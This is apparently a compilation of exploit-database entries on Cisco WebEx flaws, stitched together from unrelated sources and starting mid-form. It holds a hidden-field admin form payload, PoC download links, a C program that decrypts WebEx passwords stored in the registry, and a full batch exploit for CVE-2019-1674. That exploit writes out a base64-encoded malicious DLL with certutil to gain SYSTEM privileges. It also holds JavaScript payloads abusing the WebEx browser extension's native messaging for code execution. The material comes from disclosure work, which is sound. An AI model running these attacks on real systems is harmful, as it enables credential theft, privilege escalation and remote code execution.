<input type="hidden" name="type" value="lobby-admin" />
<input type="hidden" name="cfnpassword" value="K3Y" />
<input type="hidden" name="yearlife" value="2013" />
<input type="hidden" name="hourlife" value="16" />
<input type="hidden" name="monthlife" value="7" />
<input type="hidden" name="minlife" value="17" />
<input type="hidden" name="datelife" value="16" />
<input type="hidden" name="seclife" value="0" />
<input type="submit" value="submit" />
</form>
</body>
</html>
#####################################################################################
# Application: Cisco Webex Player
# Platforms: Windows
# Versions: Cisco Webex Meeting Player version T29.10
# Author: Francis Provencher of COSIG
# Website: https://cosig.gouv.qc.ca/en/advisory/
# Twitter: @COSIG_
# Date: August 31, 2016
# CVE: CVE-2016-1464
# COSIG-2016-33
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) POC
#######################################################################################
===================
1) Introduction
===================
Cisco WebEx, formerly WebEx Communications Inc. is a company that provides on-demand collaboration, online meeting, web conferencing and videoconferencing applications. Its products include Meeting Center, Training Center, Event Center, Support Center, Sales Center, MeetMeNow, PCNow, WebEx AIM Pro Business Edition, WebEx WebOffice, and WebEx Connect. All WebEx products are part of the Cisco collaboration portfolio. All Cisco WebEx products are offered by Cisco Systems Inc.
(https://en.wikipedia.org/wiki/WebEx)
#######################################################################################
===================
2) Report Timeline
===================
2016-05-25: Francis Provencher of COSIG report the vulnerability to Cisco PSIRT
2016-06-07: Cisco PSIRT confirm the vulnerability
2016-08-09: Cisco fixed the issue
2016-08-09: Advisory released
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160831-meetings-player
#######################################################################################
===================
3) Technical details
===================
The specific flaw exists within the parsing process of an invalid JPG in WRF file. An attacker can use this flaw to create a use-after-free memory corruption, which could allow for the execution of arbitrary code in the context of the current process
#######################################################################################
==========
4) POC
==========
https://cosig.gouv.qc.ca/wp-content/uploads/2016/09/COSIG-2016-33.zip
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40508.zip
#######################################################################################
#####################################################################################
# Application: Cisco Webex Player
# Platforms: Windows
# Versions: Cisco Webex Meeting Player version T29.10
# Author: Francis Provencher of COSIG
# Website: https://cosig.gouv.qc.ca/en/advisory/
# Twitter: @COSIG_
# Date: August 31, 2016
# CVE: CVE-2016-1415
# COSIG-2016-34
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) POC
#######################################################################################
===================
1) Introduction
===================
Cisco WebEx, formerly WebEx Communications Inc. is a company that provides on-demand collaboration, online meeting, web conferencing and videoconferencing applications. Its products include Meeting Center, Training Center, Event Center, Support Center, Sales Center, MeetMeNow, PCNow, WebEx AIM Pro Business Edition, WebEx WebOffice, and WebEx Connect. All WebEx products are part of the Cisco collaboration portfolio. All Cisco WebEx products are offered by Cisco Systems Inc.
(https://en.wikipedia.org/wiki/WebEx)
#######################################################################################
===================
2) Report Timeline
===================
2016-05-25: Francis Provencher of COSIG report the vulnerability to Cisco PSIRT
2016-06-07: Cisco PSIRT confirm the vulnerability
2016-08-09: Cisco fixed the issue
2016-08-09: Advisory released
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160831-meetings-player
#######################################################################################
===================
3) Technical details
===================
The flaw exists within the parsing process of an invalid ARF file. An attacker can use this flaw to create an out-of-bound memory corruption which could allow for the execution of arbitrary code in the context of the current process.
#######################################################################################
==========
4) POC
==========
https://cosig.gouv.qc.ca/wp-content/uploads/2016/09/COSIG-2016-34.zip
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40509.zip
#######################################################################################
// source: https://www.securityfocus.com/bid/61304/info
Cisco WebEx One-Click Client is prone to an information disclosure vulnerability.
Successful exploits may allow an attacker to disclose sensitive information such as stored passwords; this may aid in further attacks.
/*
WebEx One-Click Registry Key Decryptor
brad.antoniewicz@foundstone.coma
compile with gcc -o webex-onedecrypt -lssl webex-onedecrypt.c
Thanks to https://code.google.com/p/tps-cripto-itba/source/browse/trunk/src/criptography
for making life easy
see comments below
*/
#include <openssl/aes.h>
#include <string.h>
#include <stdlib.h>
#include <stdio.h>
unsigned char *
aes_ofb_encrypt(unsigned char * text, int length, unsigned char * key, unsigned char * iv)
{
unsigned char * outbuf = calloc(1,length);
int num = 0;
unsigned char liv[16];
memcpy(liv,iv,16);
AES_KEY aeskey;
//memset(outbuf, 0, 8);
AES_set_encrypt_key(key, 256, &aeskey);
AES_ofb128_encrypt(text, outbuf, length, &aeskey, liv, &num);
return outbuf;
}
unsigned char *
aes_ofb_decrypt(unsigned char * enc, int length, unsigned char * key, unsigned char * iv)
{
unsigned char * outbuf= calloc(1,length);
int num = 0;
unsigned char liv[16];
memcpy(liv,iv,16);
AES_KEY aeskey;
AES_set_encrypt_key(key, 256, &aeskey);
AES_ofb128_encrypt(enc, outbuf, length, &aeskey, liv, &num);
return outbuf;
}
void main() {
/*
This value is from
HKEY_CURRENT_USER\Software\WebEx\ProdTools\Password
*/
unsigned char * regVal = "\xcc\x6d\xc9\x3b\xa0\xcc\x4c\x76\x55\xc9\x3b\x9f";
/*
This value is from
HKEY_CURRENT_USER\Software\WebEx\ProdTools\PasswordLen
*/
int regLength = 12;
/*
This value is a combination of these two registry keys:
HKEY_CURRENT_USER\Software\WebEx\ProdTools\UserName
HKEY_CURRENT_USER\Software\WebEx\ProdTools\SiteName
Basicaly the username and the sitename padding to 32 characters, if the
two dont add up to 32 characters, its just repeated until it fits
*/
unsigned char key[32] = "braantonsiteaa.webex.com/siteaab";
/*
The IV is static, particularly complex value of 123456789abcdef....
*/
unsigned char iv[16] = { 0x12, 0x34, 0x56, 0x78, 0x9a, 0xbc, 0xde, 0xf0, 0x34, 0x56, 0x78, 0x9a, 0xbc, 0xde, 0xf0, 0x12 };
/*
These are just for testing, you'd probably not have the password :)
*/
unsigned char * password = "bradbradbrad";
int pwLength = strlen((char *)password);
unsigned char * enc = NULL;
unsigned char * enc2 = NULL;
int i = 0;
printf("Reg Key Value = ");
enc = aes_ofb_encrypt(password, pwLength, key, iv);
for(i=0;i<pwLength;i++) {
printf("%02x ", enc[i]);
}
printf("\n");
printf("Password = ");
enc2 = aes_ofb_decrypt(regVal, regLength, key, iv);
for(i=0;i<regLength;i++) {
printf("%c", enc2[i]);
}
printf("\n");
}
SecureAuth - SecureAuth Labs Advisory
http://www.secureauth.com/
Cisco WebEx Meetings Elevation of Privilege Vulnerability Version 2
1. *Advisory Information*
Title: Cisco WebEx Meetings Elevation of Privilege Vulnerability Version 2
Advisory ID: CORE-2018-0012
Advisory URL:
http://www.secureauth.com/labs/advisories/cisco-webex-meetings-elevation-privilege-vulnerability-version-2
Date published: 2019-02-27
Date of last update: 2019-02-27
Vendors contacted: Cisco
Release mode: Coordinated release
2. *Vulnerability Information*
Class: OS command injection [CWE-78]
Impact: Code execution
Remotely Exploitable: No
Locally Exploitable: Yes
CVE Name: CVE-2019-1674
3. *Vulnerability Description*
Cisco's Webex Meetings website states that [1]:
Cisco Webex Meetings: Simply the Best Video Conferencing and Online
Meetings.
With Cisco Webex Meetings, joining is a breeze, audio and video are
clear, and screen sharing is
easier than ever. We help you forget about the technology, to focus on
what matters.
A vulnerability in the update service of Cisco Webex Meetings Desktop
App for Windows could allow
a local attacker to elevate privileges.
4. *Vulnerable Packages*
. Cisco Webex Meetings Desktop App v33.6.4.15
. Cisco Webex Meetings Desktop App v33.6.5.2
. Cisco Webex Meetings Desktop App v33.7.0.694
. Cisco Webex Meetings Desktop App v33.7.1.15
. Cisco Webex Meetings Desktop App v33.7.2.24
. Cisco Webex Meetings Desktop App v33.7.3.7
. Cisco Webex Meetings Desktop App v33.8.0.779
. Cisco Webex Meetings Desktop App v33.8.1.13
. Cisco Webex Meetings Desktop App v33.8.2.7
. Older versions are probably affected too, but they were
not checked.
5. *Vendor Information, Solutions and Workarounds*
Cisco informed that released the vulnerability is fixed in Cisco Webex
Meetings Desktop App releases 33.6.6 and 33.9.1.
In addition, Cisco published the following advisory:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190227-wmda-cmdinj
6. *Credits*
This vulnerability was discovered and researched by Marcos Accossatto
from SecureAuth. The publication of this advisory was coordinated by
Leandro Cuozzo from SecureAuth Advisories Team.
7. *Technical Description / Proof of Concept Code*
7.1. *Privilege Escalation*
[CVE-2019-1674]
The update service of Cisco Webex Meetings Desktop App for Windows does
not properly validate version numbers of new files. An unprivileged
local attacker could exploit this vulnerability by invoking the update
service command with a crafted argument and folder. This will allow the
attacker to run arbitrary commands with SYSTEM user privileges.
The vulnerability can be exploited by copying to a local attacker
controller folder, the atgpcdec.dll binary and rename it as atgpcdec.7z.
Then, a previous version of the ptUpdate.exe file must be compressed as
7z and copied to the controller folder. Also, a malicious dll must be
placed in the same folder, named vcruntime140.dll and compressed as
vcruntime140.7z. Finally, a ptUpdate.xml file must be provided in the
controller folder for the update binary (ptUpdate.exe) to treat our
files as a normal update. To gain privileges, the attacker must start
the service with the command line:
sc start webexservice WebexService 1 989898 "attacker-controlled-path"
Proof of Concept:
The following proof of concept performs a 2 step attack, since starting
from version 33.8.X, the application enforces the checking of signatures
for all the downloaded binaries. This 2 step attack works against all
the mentioned vulnerable packages. Notice that you'll need the previous
versions of the ptUpdate.exe executable. Those versions are:
3307.1.1811.1500 for the first step and 3306.4.1811.1600 for the last
step. To exploit version priot to 33.8.X, only one step is required
(the last step in this PoC).
Batch file:
/-----
@echo off
REM Contents of PoC.bat
REM
REM This batch file will exploit CVE-2019-1674
REM
REM First, it will copy the atgpcdec.dll file from the installation
REM folder to the current folder as atgpcdec.7z. Then, it will backup
REM ptUpdate.exe and vcruntime140.dll files from the installation folder
REM in the current folder, adding .bak to their names. Keep in mind that
REM those files will be replaced (especially, vcruntime140.dll) and if
REM not restored, will render the application useless.
REM
REM The executable ptUpdate.exe version 3307.1.1811.1500 must be
REM compressed as ptUpdate0.7z and present in the current folder.
REM The executable ptUpdate.exe version 3306.4.1811.1600 must be
REM compressed as ptUpdate1.7z and present in the current folder.
REM Both can be generated using 7zip GUI and compressing as 7z, with
REM normal compression level and LZMA compression method.
REM Another way is to compress both files using the command line app:
REM
REM 7z.exe a ptUpdate0.7z ptUpdate.exe -m0=BCJ -m1=LZMA:d=21
REM
REM ptUpdate0.xml file will be used in the first stage of the attack. It
REM will be renamed to ptUpdate.xml. Make sure to check and adjust (if
REM necessary) the "Size" and "PackagedSize" values of the xml, to the
REM ptUpdate0.7z ones. ptUpdate0.7z will be renamed to ptUpdate.7z. Then
REM the update service will be started.
REM
REM The batch will wait until the process (ptUpdate.exe) finishes
REM
REM After the first stage is completeted, it will rename ptUpdate.7z
REM back to ptUpdate0.7z, and ptUpdate.xml to ptUpdate0.xml.
REM
REM Now, ptUpdate1.xml file will be used in the second stage of the
REM attack. It will be renamed to ptUpdate.xml. Also, ptUpdate1.7z will
REM be renamed to ptUpdate.7z. Remember to check and adjust (if
REM necessary) the "Size" and "PackagedSize" values of the xml, to the
REM ptUpdate1.7z ones. Out "malicious" DLL will be generated using
REM certutil.exe and named vcruntime140.7z. It's a simple dll that will
REM execute notepad.exe on load and that has the same exported functions
REM as the original. The update service will be started again.
REM
REM The batch will wait until the process (ptUpdate.exe) finishes
REM
REM Once finished, it will print that the attack is done and wait for a
REM key press. You should see a notepad.exe (2, in fact) with SYSTEM
REM user privileges running.
REM
REM After a key is pressed, the batch will finish removing atgpcdec.7z
REM and vcruntime140.7z. Also it will rename ptUpdate.7z back to
REM ptUpdate1.7z, and ptUpdate.xml to ptUpdate1.xml.
:CheckOS
IF EXIST "%PROGRAMFILES(X86)%" (GOTO 64BIT) ELSE (GOTO 32BIT)
:64BIT
copy "%PROGRAMFILES(X86)%\Webex\Webex\Applications\atgpcdec.dll" atgpcdec.7z
copy "%PROGRAMFILES(X86)%\Webex\Webex\Applications\ptUpdate.exe"
ptUpdate.exe.bak
copy "%PROGRAMFILES(X86)%\Webex\Webex\Applications\vcruntime140.dll"
vcruntime140.dll.bak
GOTO END
:32BIT
copy "%PROGRAMFILES%\Webex\Webex\Applications\atgpcdec.dll" atgpcdec.7z
copy "%PROGRAMFILES%\Webex\Webex\Applications\ptUpdate.exe" ptUpdate.exe.bak
copy "%PROGRAMFILES%\Webex\Webex\Applications\vcruntime140.dll"
vcruntime140.dll.bak
GOTO END
:END
ren ptUpdate0.xml ptUpdate.xml
ren ptUpdate0.7z ptUpdate.7z
SET mypath=%~dp0
sc start webexservice WebexService 1 989898 %mypath:~0,-1%
ECHO Waiting 3 seconds until ptUpdate.exe starts
Timeout /T 3 /Nobreak
:LOOP1
tasklist | find /i "ptUpdate" >nul 2>&1
IF ERRORLEVEL 1 (
GOTO CONTINUE1
) ELSE (
ECHO ptUpdate.exe is still running
Timeout /T 1 /Nobreak
GOTO LOOP1
)
:CONTINUE1
ren ptUpdate.xml ptUpdate0.xml
ren ptUpdate.7z ptUpdate0.7z
ren ptUpdate1.xml ptUpdate.xml
ren ptUpdate1.7z ptUpdate.7z
echo
N3q8ryccAARIz/fVRwYAAAAAAAB6AAAAAAAAANcfWYEAJpaOcAAX9+wFu+r0/5QBL0TuTr0Jkm3dgTnz3Weoe6NfFfEa/Y28zsBB2HEdPWzlugty+IIM4hglhy/h80OeyYw5CMe7jUK77wLPQMC9wwpT+oLYVDSuOK/v2WNuOLCpU3qtGSO+2sIFpGixpKQvLykpGOZUMczuRNNr/8Ps1lApsqe0ERm7gPGyiMqJBOCOVTC85lKIa2Cmc
> dll.txt
echo
scrjgqKPPNmbXvscJWxmvv4NtC3mLQ1KuXYBSZXmFp8dR+ZDy5znkGG/C3w0T76c4wRCfOk+/myji9luDzO2OOwp8wgpN1QeGsA4+kaZwKYTisIvPegsI2joDsLAomIh2ToXENtcOA9/11kkJy4ColEdqlXxwSW2u45ajuNDs0aAE9nbz4AWXtv/VPfc4fn3Q+mN7FTmaDUr8dxZ5V05IafOO2qTgdSHPemTasMSqYLbzA8iaxBZimokw
>> dll.txt
echo
zyzr3fwZIci+Ewzq5BnNXk+lvA30xCUYdvQuMCGkxBozk9Ec0kQ/SUixz77Nc9SbJnm0Hncff3QRRlU9ciqc6cYkQ2Cm+/dWkyDgJU+sxT9VGV+WVwNK85Q6zpPWLeVRYtk9UkxKHF0aXf3l/OgfQqtz0WSR94AF+Z9AiblDy0zOreSW8PhFbu0hfAgY1pMNC5gPNJiJ3OGwT/cLEhBPusvpfcLP3V0BwXx04T+5R7d5Rw9xWExdfCzGb
>> dll.txt
echo
Mgyijdf5nP7fv9e5V0KO8kKrGVofstVIN8FTQSMeRGYRdv9WyuLRFWbArCL86HMo5NYEwFinlqCGqnY8hZcDMPe89q1xoNlVDmDtLC+AZqEkPKuqStllzKH7qQDg7Ahe6AMtGjaT2NptL2bSBYlkfn+1iiMt5cC/inZAoZoreSpDbGb4HRcOVce7ZKeiBAFpEzM0bEXAxnbLNO0pHm0bYCftbOkffJap3m79V+Dj4t0NPgwbhYKUqk1Hi
>> dll.txt
echo
/9ebVE+IIsUlFFggilCy7BmIh3MF3Gmuhr7QLK37zV72LA0/tuDXXTWP/0EJEQ3F/v1+hSj/+HMwUBFL8xsghBfOXTpmBG6cUxK2YOwXvs/ntja2a7SWwppxtWgr4n/pxEdeezoBGl1sTZ9aIwSlu1mMehS5RYoyiSKnQfgLMsIYLqjZtc2DjUdSZDutZgC91axMjIEQ8kDIBp8dbuX4MpzNYe65OrKG/u76aemvcQ/R1QAwgTopuWgqO
>> dll.txt
echo
tJ7LIkRv406u+Qs2d5KA9+IplFV7ZL9w1zXTDTFqATROK0IKtY2MPaP5Ia0d0UFizj0I7OZSeDtZXPohMxi01xMLyqCXIQ4vaJGVneNi1SyxAJ2hV92+5sxBCOlQ+d4w19k6iJA/siz1+V0FnIrN6csCMaW6yBnR6H+jHpm2sqXf3xyU8UkCRx09LmD1lcSB3sWdc3AnoG2ijb7lD6eBdCH2OlMWceeAfOMRm48MfYW6+AcZJm9wEQ9p8
>> dll.txt
echo
irxwCQuETvGMphqzbPxFJXErhoMTxlE57+/ZLBt8F/3XAaxQnmMucvSCFMYc6Z76OCbeotPfVnPhqL+torsEaph6DFzcw3dWuFrekbLnVVFKmM/QyeZVLS18u5lY1tGRyfAUCyhPIPJvUcXFKuDYHmdT/bOnF1B/xexvtY8boRhcKiNg4JBluTMbamdoktvfWvIVGUz2m50yA0dNN06yebHietxA+IwM0zfNbqpNWJjOItsi6/27j1mE7
>> dll.txt
echo
WCgPS5tetN44WkYD28Bm+LmHwz4lbPVjAIcgZBv0OtAXJsWMUtN8Bc2z9+fVSqc7pCHGCRnYDyKm8QhcV8hU4I/M4hSN+BWYn2jGJqc42lcaMzfXrySCnF4dAtIiE1HzAwmwWAqjlVkZdFiIuQ1m+pdbx2Ipji5piYRAJtykwO0H5JThzAzJGObOMCAenaKgvgtwF97iFdBZHxuSz+3DcYF6gQupm/BxNd35l6qj19sN2qixeGJ7rQapV
>> dll.txt
echo
DJLTM5KMPdSItBNJSLLp9fuObcufi/6MBif28vemivzaWtalocJxX/MJni8PfdLYn/rLJQXmpq4Qm7z6N7FlPLtelATkMAZZ2ofaLFeBvIKzymBqtsxQAb63b+MowQvOkGAesT5JNXhoRqzOoATB9I/O7xIZu30SZwWdW85DX2MNAeB/DgzLt/c7U9A2D5vIgAEEBgABCYZHAAcLAQACIwMBAQVdABgAAAQDAwEDAQAMmACYAAAICgGcR
>> dll.txt
echo
dWGAAAFARkLAAAAAAAAAAAAAAARIwB2AGMAcgB1AG4AdABpAG0AZQAxADQAMAAuAGQAbABsAAAAGQAUCgEAkBJyInaL1AEVBgEAIAAAAAAA
>> dll.txt
certutil -decode dll.txt vcruntime140.7z
del dll.txt
SET mypath=%~dp0
sc start webexservice WebexService 1 989898 %mypath:~0,-1%
ECHO Waiting 3 seconds until ptUpdate.exe starts
Timeout /T 3 /Nobreak
:LOOP2
tasklist | find /i "ptUpdate" >nul 2>&1
IF ERRORLEVEL 1 (
GOTO CONTINUE2
) ELSE (
ECHO ptUpdate.exe is still running
Timeout /T 1 /Nobreak
GOTO LOOP2
)
:CONTINUE2
ECHO Attack done!
pause
ren ptUpdate.xml ptUpdate1.xml
ren ptUpdate.7z ptUpdate1.7z
del atgpcdec.7z
del vcruntime140.7z
-----/
ptUpdate0.xml file:
/-----
<?xml version="1.0"?>
<serv:message xmlns:serv="http://www.webex.com/schemas/2002/06/service"
xmlns:com="http://www.webex.com/schemas/2002/06/common"
xmlns:use="http://www.webex.com/schemas/2002/06/service/user">
<serv:header></serv:header>
<serv:body>
<serv:bodyContent xsi:type="use:getUpdateResponse"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<UpdateVersionNumber>33.8.3</UpdateVersionNumber>
<BuildNumber>33.8.3-24</BuildNumber>
<ExternalVersionNumber>33.8.3.24</ExternalVersionNumber>
<GPCINI>self/gpc.php</GPCINI>
<ReleaseDate>February 2017</ReleaseDate>
<Description>WebEx Productivity Tools 33.8.3</Description>
<MsiLocation>msi/ptools.msi</MsiLocation>
<UpdateFormat>binary</UpdateFormat>
<ReleaseTrain>T32</ReleaseTrain>
<Location>$dummy/upgradeserver/client/ptool/33.8.3</Location>
<ControlOption>0</ControlOption>
<WBSVERSION>33</WBSVERSION>
<Server>myCompany.webex.com</Server>
<UserName>MCKSysAR@myCompany.com</UserName>
<DownloadSize>22496333</DownloadSize>
<VersionURL/>
<FileInfo>
<SectionName>Installation</SectionName>
<PackedName>ptupdate.7z</PackedName>
<PackedNameL10N>ptupdate.7z</PackedNameL10N>
<OrigianlName>ptupdate.exe</OrigianlName>
<Version>3307,1,1811,1500</Version>
<Size>1985592</Size>
<PackagedSize>610752</PackagedSize>
<CheckMethod>1</CheckMethod>
<CouldIgnore>1</CouldIgnore>
<NeedDownLoad>1</NeedDownLoad>
</FileInfo>
<Tools>
<UseEmailType/>
<Outlook>0</Outlook>
<Notes>0</Notes>
<UseWebExWithOffice>1</UseWebExWithOffice>
<Excel>0</Excel>
<PowerPoint>0</PowerPoint>
<Word>0</Word>
<IEShortCut>1</IEShortCut>
<IERightMenu>0</IERightMenu>
<UseWebExWithIM>1</UseWebExWithIM>
<AOL>0</AOL>
<Sametime>0</Sametime>
<WindowsMessenger>0</WindowsMessenger>
<Yahoo>0</Yahoo>
<Skype>0</Skype>
<GoogleTalk>0</GoogleTalk>
<Firefox/>
<IPPhone>1</IPPhone>
</Tools>
</serv:bodyContent>
</serv:body>
</serv:message>
-----/
ptUpdate1.xml file:
/-----
<?xml version="1.0"?>
<serv:message xmlns:serv="http://www.webex.com/schemas/2002/06/service"
xmlns:com="http://www.webex.com/schemas/2002/06/common"
xmlns:use="http://www.webex.com/schemas/2002/06/service/user">
<serv:header>
</serv:header>
<serv:body>
<serv:bodyContent xsi:type="use:getUpdateResponse"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<UpdateVersionNumber>33.8.4</UpdateVersionNumber>
<BuildNumber>33.8.4-24</BuildNumber>
<ExternalVersionNumber>33.8.4.24</ExternalVersionNumber>
<GPCINI>self/gpc.php</GPCINI>
<ReleaseDate>February 2017</ReleaseDate>
<Description>WebEx Productivity Tools 33.8.4</Description>
<MsiLocation>msi/ptools.msi</MsiLocation>
<UpdateFormat>binary</UpdateFormat>
<ReleaseTrain>T32</ReleaseTrain>
<Location>$dummy/upgradeserver/client/ptool/33.8.4</Location>
<ControlOption>0</ControlOption>
<WBSVERSION>33</WBSVERSION>
<Server>myCompany.webex.com</Server>
<UserName>MCKSysAR@myCompany.com</UserName>
<DownloadSize>22496333</DownloadSize>
<VersionURL/>
<FileInfo>
<SectionName>Common</SectionName>
<PackedName>vcruntime140.7z</PackedName>
<PackedNameL10N>vcruntime140.7z</PackedNameL10N>
<OrigianlName>vcruntime140.dll</OrigianlName>
<Version>14,14,26405,0</Version>
<Size>6144</Size>
<PackagedSize>1761</PackagedSize>
<CheckMethod>1</CheckMethod>
<CouldIgnore>1</CouldIgnore>
<NeedDownLoad>1</NeedDownLoad>
</FileInfo>
<FileInfo>
<SectionName>Installation</SectionName>
<PackedName>ptupdate.7z</PackedName>
<PackedNameL10N>ptupdate.7z</PackedNameL10N>
<OrigianlName>ptupdate.exe</OrigianlName>
<Version>3306,4,1811,1600</Version>
<Size>1992760</Size>
<PackagedSize>611786</PackagedSize>
<CheckMethod>1</CheckMethod>
<CouldIgnore>1</CouldIgnore>
<NeedDownLoad>1</NeedDownLoad>
</FileInfo>
<Tools>
<UseEmailType/>
<Outlook>0</Outlook>
<Notes>0</Notes>
<UseWebExWithOffice>1</UseWebExWithOffice>
<Excel>0</Excel>
<PowerPoint>0</PowerPoint>
<Word>0</Word>
<IEShortCut>1</IEShortCut>
<IERightMenu>0</IERightMenu>
<UseWebExWithIM>1</UseWebExWithIM>
<AOL>0</AOL>
<Sametime>0</Sametime>
<WindowsMessenger>0</WindowsMessenger>
<Yahoo>0</Yahoo>
<Skype>0</Skype>
<GoogleTalk>0</GoogleTalk>
<Firefox/>
<IPPhone>1</IPPhone>
</Tools>
</serv:bodyContent>
</serv:body>
</serv:message>
-----/
8. *Report Timeline*
2018-12-04: SecureAuth sent an initial notification to the Cisco PSIRT
including a draft advisory.
2018-12-05: Cisco confirmed the reception of the advisory and informed
they will open a case.
2018-12-07: Cisco replied that they were able to reproduce the
vulnerability and they were working on a plan for the fix.
2018-12-07: SecureAuth thanked the update.
2018-12-10: Cisco notified SecureAuth that the general availability of
the fix will be before end of February.
2018-12-10: SecureAuth thanked the update.
2019-01-15: SecureAuth asked Cisco for an update.
2019-01-22: SecureAuth asked Cisco for an update again.
2019-01-22: Cisco answered saying they were still targeting the end of
February for the release of the fix.
2019-02-11: Cisco confirmed 27th February as the disclosure date.
2019-02-27: Advisory CORE-2018-0012 published.
9. *References*
[1] https://www.webex.com/products/video-conferencing.html
10. *About SecureAuth Labs*
SecureAuth Labs, the research arm of SecureAuth Corporation, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct research in several important areas of
computer security, including identity-related attacks, system
vulnerabilities and cyber-attack planning. Research includes problem
formalization, identification of vulnerabilities, novel solutions and
prototypes for new technologies. We regularly publish security
advisories, primary research, technical publications, research blogs,
project information, and shared software tools for public use at
http://www.secureauth.com.
11. *About SecureAuth*
SecureAuth is leveraged by leading companies, their employees, their
customers and their partners to eliminate identity-related breaches. As
a leader in access management, SecureAuth is powering an identity
security revolution by enabling people and devices to intelligently
and adaptively access systems and data, while effectively keeping bad
actors from doing harm. By ensuring the continuous assessment of risk
and enablement of trust, SecureAuth's highly flexible platform makes it
easier for organizations to prevent the misuse of credentials. To learn
more, visit www.secureauth.com, call (949) 777-6959, or email us at
info@secureauth.com
12. *Disclaimer*
The contents of this advisory are copyright (c) 2019 SecureAuth, and are
licensed under a Creative Commons Attribution Non-Commercial Share-Alike
3.0 (United States) License:
http://creativecommons.org/licenses/by-nc-sa/3.0/us/
<!--
Cisco's WebEx extension (jlhmfgmfgeifomenelglieieghnjghma) has ~20M active users, and is part of Cisco's popular web conferencing software.
The extension works on any URL that contains the magic pattern "cwcsf-nativemsg-iframe-43c85c0d-d633-af5e-c056-32dc7efc570b.html", which can be extracted from the extensions manifest. Note that the pattern can occur in an iframe, so there is not necessarily any user-visible indication of what is happening, visiting any website would be enough.
The extension uses nativeMessaging, so this magic string is enough for any website to execute arbitrary code (!!).
The protocol the extension uses is complicated, using CustomEvent() objects to pass JSON messages between the webpage, the extension and the native code.
Stepping through an initialization, a website must first request that the extension open a port for communication, like this:
document.dispatchEvent(new CustomEvent("connect", { detail: { token: "token" }})); // token can be any string
Then messages can passed to native code via "message" events. Note that these cannot be MessageEvent() objects, and you cannot use the postMessage API, they have to be CustomEvent() objects.
There are a few different message types, such as "hello", "disconnect", etc. The most interesting is "launch_meeting":
document.dispatchEvent(new CustomEvent("message", { detail: {
message: JSON.stringify(msg),
message_type: "launch_meeting",
timestamp: (new Date()).toUTCString(),
token: "token"
}
}));
I stepped through a meeting and dumped the initialization messages:
> message.message
"{"DocshowVersion": "1.0",
"FilterSecParameters": "clientparam;clientparam_value",
"GpcProductRoot": "WebEx",
"GpcMovingInSubdir": "Wanta",
"GpcProductVersion": "T30_MC",
"GpcUpgradeManagement": "false",
"GpcCompatibleDesktopClients": "",
"enableQuickLaunch": "1",
"GpcProductDescription": "V2ViRXg=",
"GpcUnpackName": "atgpcdec",
"JMTSignificantFileList": "atgpcext.dll;atmccli.dll;comui.dll;webexmgr.dll;plugin-config.xml;atmgr.exe;ieatgpc.dll;atkbctl.dll;atwbxui15.dll;atcarmcl.dll;attp.dll;atarm.dll;wbxcrypt.dll;mmssl32.dll;libeay32.dll;ssleay32.dll;atmemmgr.dll;wcldll.dll;uilibres.dll;pfwres.dll;wbxtrace.dll;mcres.dll;atresec.dll;atrestc.dll;mfs.dll;mutilpd.dll;wseclient.dll;mticket.dll;wsertp.dll",
"jmtclicklog": "1484862376664",
"GpcExtName": "atgpcext",
"GpcUnpackVersion": "27, 17, 2016, 501",
"GpcExtVersion": "3015, 0, 2016, 1117",
"GpcUrlRoot": "https://join-test.webex.com/client/WBXclient-T30L10NSP15EP1-10007/webex/self",
"GpcComponentName": "YXRtY2NsaS5ETEw=",
"GpcCompressMethod": "7z",
"GpcActiveIniSection": "V2ViRXhfVg==",
"GpcSupportPageUrl": "",
"GpcIniFileName": "Z3BjLnBocD9wbW9kdWxlcz0lN0NNQ19TVEQlN0NDaGF0JTdDUG9sbGluZyU3Q05vdGUlN0NWaWRlb1NoYXJlJTdDV2ViZXhfUkElN0NBUyU3Q1BEJk9TPVZUJnJlcGxhY2VLZXk9VklTVEElN0NTU0YmTE49JmJhc2ljbmFtZT1XZWJFeF9WJk9TX0JpdD0zMg==
...
There are a huge number of properties, many are obviously good candidates for code execution, but these jumped out at me:
"GpcComponentName": "YXRtY2NsaS5ETEw=",
"GpcInitCall": "c3pDb29raWU9SW5pdENvbnRyb2woJUhXTkQpO05hbWVWYWx1ZShMb2dnaW5nVVJMX05hbWUsTG9nZ2luZ1VSTCk7TmFtZVZhbHVlKE1lZXRpbmdJRF9OYW1lLE1lZXRpbmdJRCk7TmFtZVZhbHVlKFNlc3Npb25JRF9OYW1lLFNlc3Npb25JRCk7TmFtZVZhbHVlKEdwY0luaUZpbGVOYW1lX05hbWUsR3BjSW5pRmlsZU5hbWUpO05hbWVWYWx1ZShHcGNVcmxSb290X05hbWUsR3BjVXJsUm9vdCk7TmFtZVZhbHVlKEdwY0V4dFZlcnNpb25fTmFtZSxHcGNFeHRWZXJzaW9uKTtOYW1lVmFsdWUoR3BjVW5wYWNrVmVyc2lvbl9OYW1lLEdwY1VucGFja1ZlcnNpb24pO05hbWVWYWx1ZShHcGNQcm9kdWN0Um9vdF9OYW1lLEdwY1Byb2R1Y3RSb290KTtOYW1lVmFsdWUobG9jYWxyb290c2VjdGlvbnZlcl9OYW1lLGxvY2Fscm9vdHNlY3Rpb252ZXIpO05hbWVWYWx1ZShSZWdUeXBlX05hbWUsUmVnVHlwZSk7TmFtZVZhbHVlKEdwY1Byb2dyZXNzQmFyVGl0bGVfTmFtZSxHcGNQcm9ncmVzc0JhclRpdGxlKTtOYW1lVmFsdWUoR3BjTWVzc2FnZVRpdGxlX05hbWUsR3BjTWVzc2FnZVRpdGxlKTtOYW1lVmFsdWUoZG93bmxvYWRsb2NhbHNldHRpbmdfTmFtZSxkb3dubG9hZGxvY2Fsc2V0dGluZyk7TmFtZVZhbHVlKHByb2R1Y3RuYW1lX05hbWUscHJvZHVjdG5hbWUpO05hbWVWYWx1ZShTRlN1cHBvcnRpbmdfTmFtZSxTRlN1cHBvcnRpbmdfVmFsdWUpO05hbWVWYWx1ZShNZWV0aW5nUmFuZG9tX05hbWUsTWVldGluZ1JhbmRvbSk7TmFtZ